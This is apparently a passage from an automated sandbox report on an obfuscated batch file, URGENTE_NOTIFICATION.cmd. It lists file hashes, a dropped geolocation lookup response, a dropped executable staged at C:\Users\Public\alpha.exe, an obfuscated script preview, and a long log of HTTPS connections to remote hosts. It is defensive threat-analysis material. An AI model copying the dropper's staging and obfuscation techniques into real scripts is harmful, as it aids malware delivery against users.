SSDEEP:	12:tkbOnd6CsGkMyGWKyGXPVGArwY3o/IomaoHNmGNArpv/mOAaNO+ao9W7iN5zzkwn:qbCdRNuKyGX85jrvXhNlT3/7sYDsro
MD5:	C73B159871D7780F018E99406AD5AF76
SHA1:	5270DB444A46AB3CBAE1753308FED10CAFDD6F80
SHA-256:	453DB0468A2C6F5EEDC35565E202913D388A52D300BDF82C8995EFA4BCC9BECA
SHA-512:	BEC715180705256A692978960027E09476D42001D7BDD7E4B8EAF6B4074DD484FA143E7629BCF80A825745A24978BF97E82AB7A143AC4BD54E7CA01DE4117D7C
Malicious:	false
Preview:	{. "geoplugin_request":"154.16.105.36",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Las Vegas",. "geoplugin_region":"Nevada",. "geoplugin_regionCode":"NV",. "geoplugin_regionName":"Nevada",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"839",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"36.1685",. "geoplugin_longitude":"-115.1164",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/Los_Angeles",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

\Device\Null

Download File

Process:	C:\Users\Public\alpha.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	104
Entropy (8bit):	4.403504238247217
Encrypted:	false
SSDEEP:	3:HnRthLK5aTRECUAdROGCOwXWnjTRrGIAOFZRMQcv:HRoAREYTOGjHVF+
MD5:	E14D0D771A7FEB9D78EA3DCA9197BA2A
SHA1:	48E363AAD601D9073D803AA9D224BF9A7FC39119
SHA-256:	0C13A861207709C246F13ACE164529F31F2F91CF14BD37795192D5B37E965BE6
SHA-512:	3460F93FEA31D68E49B1B82EDCB8A2A9FCCE34910DD04DEE7BD7503DB8DAB6D1D5C73CBD2C15156DCB601512AD68DE6FEF7DCB8F8A72A8A0747248B378C17CF9
Malicious:	false
Preview:	The system cannot find message text for message number 0x400023a1 in the message file for Application...

Static File Info

General

File type:	Unicode text, UTF-8 text, with very long lines (1320), with CRLF line terminators
Entropy (8bit):	5.010176596857632
TrID:
File name:	URGENTE_NOTIFICATION.cmd
File size:	4'541'473 bytes
MD5:	10dfd3dccfeaeb1e19e586e5d89ef1c6
SHA1:	af3aa6b4249a27778de9e8b2fc2ee6badb0e299a
SHA256:	f81c9ad169f7dcfa4545eab3552115156d7923957c1cffc4809a574209599e3c
SHA512:	f8b3d6cc712792f1fa567ecf730809c4b49241e6b5fb31961bf8643a2b7a0af3635672cee0d2ac8e02312c1727ec3c01abb7e35ce49a831865d6a16b66b5ce7e
SSDEEP:	49152:EEi0F7JFavH5JDy0oqMaKcCln2UE+ESPTcexrEPdOgSlxHgamuc6slj:e
TLSH:	0A26B6E33DAF16CA9705736B974FE4640A1BCC240BC2DFEC50E69588580BF5B2990F5A
File Content Preview:	@% ...................%e%.................. %c%............%h%.......%o%.......... ............% %...r...%o%r........................%f%.........%f%............%..C%...............%:%...............o......... %\%... ............r......%\%.................

File Icon


Icon Hash:	9686878b929a9886

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 24, 2024 08:40:04.490901947 CEST	49730	443	192.168.2.4	74.112.186.144
Apr 24, 2024 08:40:04.490988016 CEST	443	49730	74.112.186.144	192.168.2.4
Apr 24, 2024 08:40:04.491089106 CEST	49730	443	192.168.2.4	74.112.186.144
Apr 24, 2024 08:40:04.491218090 CEST	49730	443	192.168.2.4	74.112.186.144
Apr 24, 2024 08:40:04.491416931 CEST	443	49730	74.112.186.144	192.168.2.4
Apr 24, 2024 08:40:04.493403912 CEST	49730	443	192.168.2.4	74.112.186.144
Apr 24, 2024 08:40:04.519649029 CEST	49731	443	192.168.2.4	74.112.186.144
Apr 24, 2024 08:40:04.519752979 CEST	443	49731	74.112.186.144	192.168.2.4
Apr 24, 2024 08:40:04.519860029 CEST	49731	443	192.168.2.4	74.112.186.144
Apr 24, 2024 08:40:04.523391962 CEST	49731	443	192.168.2.4	74.112.186.144
Apr 24, 2024 08:40:04.523425102 CEST	443	49731	74.112.186.144	192.168.2.4
Apr 24, 2024 08:40:04.885901928 CEST	443	49731	74.112.186.144	192.168.2.4
Apr 24, 2024 08:40:04.885977983 CEST	49731	443	192.168.2.4	74.112.186.144
Apr 24, 2024 08:40:04.889708042 CEST	49731	443	192.168.2.4	74.112.186.144
Apr 24, 2024 08:40:04.889717102 CEST	443	49731	74.112.186.144	192.168.2.4
Apr 24, 2024 08:40:04.890126944 CEST	443	49731	74.112.186.144	192.168.2.4
Apr 24, 2024 08:40:04.941360950 CEST	49731	443	192.168.2.4	74.112.186.144
Apr 24, 2024 08:40:04.984159946 CEST	443	49731	74.112.186.144	192.168.2.4
Apr 24, 2024 08:40:05.258723021 CEST	443	49731	74.112.186.144	192.168.2.4
Apr 24, 2024 08:40:05.258902073 CEST	443	49731	74.112.186.144	192.168.2.4
Apr 24, 2024 08:40:05.259078026 CEST	49731	443	192.168.2.4	74.112.186.144
Apr 24, 2024 08:40:05.260411024 CEST	49731	443	192.168.2.4	74.112.186.144
Apr 24, 2024 08:40:05.260472059 CEST	443	49731	74.112.186.144	192.168.2.4
Apr 24, 2024 08:40:05.260509014 CEST	49731	443	192.168.2.4	74.112.186.144
Apr 24, 2024 08:40:05.260524035 CEST	443	49731	74.112.186.144	192.168.2.4
Apr 24, 2024 08:40:05.263446093 CEST	49732	443	192.168.2.4	74.112.186.144
Apr 24, 2024 08:40:05.263530970 CEST	443	49732	74.112.186.144	192.168.2.4
Apr 24, 2024 08:40:05.263617039 CEST	49732	443	192.168.2.4	74.112.186.144
Apr 24, 2024 08:40:05.263813019 CEST	49732	443	192.168.2.4	74.112.186.144
Apr 24, 2024 08:40:05.263847113 CEST	443	49732	74.112.186.144	192.168.2.4
Apr 24, 2024 08:40:05.613679886 CEST	443	49732	74.112.186.144	192.168.2.4
Apr 24, 2024 08:40:05.615410089 CEST	49732	443	192.168.2.4	74.112.186.144
Apr 24, 2024 08:40:05.615463972 CEST	443	49732	74.112.186.144	192.168.2.4
Apr 24, 2024 08:40:05.616894007 CEST	49732	443	192.168.2.4	74.112.186.144
Apr 24, 2024 08:40:05.616909981 CEST	443	49732	74.112.186.144	192.168.2.4
Apr 24, 2024 08:40:06.016730070 CEST	443	49732	74.112.186.144	192.168.2.4
Apr 24, 2024 08:40:06.016906023 CEST	443	49732	74.112.186.144	192.168.2.4
Apr 24, 2024 08:40:06.017040968 CEST	49732	443	192.168.2.4	74.112.186.144
Apr 24, 2024 08:40:06.017040968 CEST	49732	443	192.168.2.4	74.112.186.144
Apr 24, 2024 08:40:06.017040968 CEST	49732	443	192.168.2.4	74.112.186.144
Apr 24, 2024 08:40:06.017107964 CEST	443	49732	74.112.186.144	192.168.2.4
Apr 24, 2024 08:40:06.193901062 CEST	49733	443	192.168.2.4	74.112.186.144
Apr 24, 2024 08:40:06.193968058 CEST	443	49733	74.112.186.144	192.168.2.4
Apr 24, 2024 08:40:06.194061995 CEST	49733	443	192.168.2.4	74.112.186.144
Apr 24, 2024 08:40:06.194372892 CEST	49733	443	192.168.2.4	74.112.186.144
Apr 24, 2024 08:40:06.194408894 CEST	443	49733	74.112.186.144	192.168.2.4
Apr 24, 2024 08:40:06.329936028 CEST	49732	443	192.168.2.4	74.112.186.144
Apr 24, 2024 08:40:06.329972982 CEST	443	49732	74.112.186.144	192.168.2.4
Apr 24, 2024 08:40:06.545073032 CEST	443	49733	74.112.186.144	192.168.2.4
Apr 24, 2024 08:40:06.545231104 CEST	49733	443	192.168.2.4	74.112.186.144
Apr 24, 2024 08:40:06.556094885 CEST	49733	443	192.168.2.4	74.112.186.144
Apr 24, 2024 08:40:06.556150913 CEST	443	49733	74.112.186.144	192.168.2.4
Apr 24, 2024 08:40:06.556907892 CEST	443	49733	74.112.186.144	192.168.2.4
Apr 24, 2024 08:40:06.558310986 CEST	49733	443	192.168.2.4	74.112.186.144
Apr 24, 2024 08:40:06.600143909 CEST	443	49733	74.112.186.144	192.168.2.4
Apr 24, 2024 08:40:07.490605116 CEST	443	49733	74.112.186.144	192.168.2.4
Apr 24, 2024 08:40:07.490660906 CEST	443	49733	74.112.186.144	192.168.2.4
Apr 24, 2024 08:40:07.490730047 CEST	49733	443	192.168.2.4	74.112.186.144
Apr 24, 2024 08:40:07.490788937 CEST	443	49733	74.112.186.144	192.168.2.4
Apr 24, 2024 08:40:07.491034985 CEST	443	49733	74.112.186.144	192.168.2.4
Apr 24, 2024 08:40:07.491065979 CEST	49733	443	192.168.2.4	74.112.186.144
Apr 24, 2024 08:40:07.491148949 CEST	49733	443	192.168.2.4	74.112.186.144
Apr 24, 2024 08:40:07.667700052 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:07.667778969 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:07.667874098 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:07.668236971 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:07.668258905 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.031191111 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.031267881 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:08.034194946 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:08.034204960 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.034599066 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.035870075 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:08.035912991 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.500585079 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.500742912 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.500828981 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.500919104 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:08.500982046 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.501044989 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:08.501055956 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.501080990 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.501127958 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:08.506057024 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.517982960 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.518079996 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.518153906 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:08.518193007 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.518255949 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:08.529747009 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.581026077 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:08.581058025 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.628921986 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:08.670985937 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.676806927 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.676883936 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.676889896 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:08.676911116 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.676963091 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:08.688611031 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.700424910 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.700495958 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.700496912 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:08.700519085 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.700673103 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:08.712347984 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.724144936 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.724215984 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.724280119 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:08.724298000 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.724355936 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:08.734865904 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.745573997 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.745695114 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.745732069 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:08.745749950 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.745800972 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:08.756417990 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.767216921 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.767276049 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:08.767287970 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.778006077 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.778157949 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.778162003 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:08.778179884 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.778240919 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:08.788778067 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.799623013 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.799696922 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:08.799710989 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.841278076 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.841444969 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:08.841460943 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.845984936 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.846043110 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:08.846054077 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.855112076 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.855178118 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:08.855190992 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.863313913 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.863377094 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:08.863392115 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.871572971 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.871635914 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:08.871653080 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.879790068 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.879846096 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:08.879875898 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.888093948 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.888180971 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:08.888202906 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.896327019 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.896383047 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:08.896394968 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.904453039 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.904505014 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:08.904515982 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.913225889 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.913300991 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:08.913314104 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.920979977 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.921051979 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:08.921083927 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.929296017 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.929356098 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:08.929371119 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.941574097 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.941633940 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:08.941646099 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.949749947 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.949806929 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:08.949819088 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.958069086 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.958131075 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:08.958141088 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.966270924 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.966325998 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:08.966337919 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.974157095 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.974214077 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:08.974225044 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.982142925 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.982202053 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:08.982212067 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.989619970 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.989676952 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:08.989687920 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.997320890 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:08.997497082 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:08.997508049 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.004971981 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.005040884 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.005052090 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.012290955 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.012352943 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.012366056 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.019830942 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.019886971 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.019897938 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.027345896 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.027409077 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.027420044 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.034631968 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.034712076 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.034724951 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.039387941 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.039443970 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.039459944 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.044145107 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.044203997 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.044224024 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.048764944 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.048834085 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.048844099 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.053353071 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.053412914 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.053425074 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.058027983 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.058083057 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.058095932 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.062561989 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.062617064 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.062628031 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.066971064 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.067032099 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.067043066 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.071476936 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.071536064 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.071547985 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.075913906 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.075963974 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.075975895 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.080087900 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.080163956 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.080176115 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.084394932 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.084455967 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.084471941 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.088532925 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.088587046 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.088598967 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.090732098 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.090802908 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.090816975 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.094991922 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.095048904 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.095061064 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.099072933 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.099132061 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.099142075 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.103323936 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.103389025 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.103399992 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.107239962 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.107297897 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.107309103 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.111305952 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.111360073 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.111371994 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.115267038 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.115329027 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.115345955 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.119357109 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.119410992 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.119421959 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.123334885 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.123393059 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.123404026 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.127132893 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.127190113 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.127202034 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.130899906 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.130959034 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.130983114 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.134741068 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.134804010 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.134833097 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.140180111 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.140235901 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.140258074 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.143850088 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.143913984 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.143925905 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.147599936 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.147651911 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.147663116 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.151314974 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.151367903 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.151379108 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.154928923 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.154983044 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.154994011 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.158519983 CEST	443	49734	74.112.186.128	192.168.2.4
